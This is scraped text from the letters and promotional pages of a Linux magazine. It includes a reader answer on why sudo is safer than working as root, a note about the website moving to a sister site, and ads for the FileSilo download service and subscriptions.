Above is the new home of our website and those of some of our sister magazines – explore its wealth of content today

choose to be in anything less than full control in Linux? Sam Grange When you’re coming from a Windows background it does seem counter-intuitive to deliberately avoid the user account that offers you the maximum amount of control, but there’s a very good reason that lots of Linux professionals do so: security. The root account is literally allowed control over everything in a Linux system, which sounds like a good idea but in practice means that other users of the computer (for example, co-workers on a corporate machine or your kids at home) have the opportunity to launch commands that you’re not aware of. Running a command with sudo (or multiple commands with su) means that you can take advantage of all the power of root when you need to, but that you’re not leaving the shell open, blindly set to root privileges – you need to reiterate that you have super user access with sudo or su each time. This minimises the risk of unwanted,

irregular or just plain wrong commands being run as root and causing errors on your system. Security isn’t just about protecting yourself, your machine and your data from hackers – it’s also about protecting it against accidental misuse.

Go go Gadget website

Hi there, For some time now I’ve found that every time I try to visit the Linux User & Developer website either via my bookmark or by typing in the address, I am sent somewhere else – to a site called I note that it seems to have content on it from Linux User & Developer along with many other interesting things, however I’m curious as to why I’m being taken there instead of to the Linux User & Developer site that I’m used to using. Please advise. Harry Rayson

The old incarnation of the Linux User & Developer website is no more – instead, several of our technology magazines now aggregate their website content through the website of our sister magazine Gadget. You’ll find a wealth of content from ourselves and our sister magazines Gadget, iCreate and Web Designer – it’s an Aladdin’s cave of tips, tutorials, hardware guides and so much more. The reason why the old website link automatically redirects you there is because it’s much more convenient for you if we just take you to the new home of the content you’re looking for, rather than manually redirecting you on the page or with new links inside the magazine. And aggregating all of the sites together gives you the opportunity to explore more content that you might find interesting, like the latest tech or a few clever tricks for working with Apple architecture or web design. Have a rummage around the site and you’ll find plenty of interesting stories, guides and more!


Free with your magazine

Instant access to these incredible free gifts…

The best distros and FOSS Essential software for your Linux PC

Professional video tutorials

The Linux Foundation shares its skills

Tutorial project files

All the assets you’ll need to follow our tutorials

Plus, all of this is yours too…

• Download Kali Linux, IPFire and Metasploitable and use them to test your security and access the FOSS in our feature

• Enjoy 20 hours of expert video tutorials from The Linux Foundation • Get the program code for our Linux and Raspberry Pi tutorials

Log in to Register to get instant access to this pack of must-have Linux distros and software, how-to videos and tutorial assets

Free for digital readers too!

Read on your tablet, download on your computer

The home of great downloads – exclusive to your favourite magazines from Imagine Publishing Secure and safe online access, from anywhere Free access for every reader, print and digital

An incredible gift for subscribers

Download only the files you want, when you want All your gifts, from all your issues, in one place

Get started Everything you need to know about accessing your FileSilo account


Follow the instructions on screen to create an account with our secure FileSilo system. Log in and unlock the issue by answering a simple question about the magazine.

Unlock every issue

Subscribe today & unlock the free gifts from more than 40 issues

Access our entire library of resources with a money saving subscription to the magazine – that’s hundreds of free resources


You can access FileSilo on any computer, tablet or smartphone device using any popular browser. However, we recommend that you use a computer to download content, as you may not be able to download files to other devices.


If you have any problems with accessing content on FileSilo take a look at the FAQs online or email our team at the address below

Over 20 hours of video guides

Essential advice from the Linux Foundation

The best Linux distros Specialist Linux operating systems

Free Open Source Software Must-have programs for your Linux PC

Head to page 32 to subscribe now Already a print subscriber? Here’s how to unlock FileSilo today… Unlock the entire LU&D FileSilo library with your unique Web ID – the eight-digit alphanumeric code that is printed above your address details on the mailing label of your subscription copies. It can also be found on any renewal letters.

More than 400 reasons to subscribe

More added every issue


Available from all good newsagents and supermarkets



E â&#x20AC;¢ FREE SU



Industry interviews | Expert tutorials & opinion | Contemporary features | Behind the build DESIGN INSPIRATION





BUY YOUR ISSUE TODAY Print edition available at Digital edition available at Available on the following platforms

Linux Server Hosting from UK Specialists

24/7 UK Support • ISO 27001 Certified • Free Migrations

Managed Hosting • Cloud Hosting • Dedicated Servers

Supreme Hosting. Supreme Support.

Read more
Read more
Similar to
Popular now
Just for you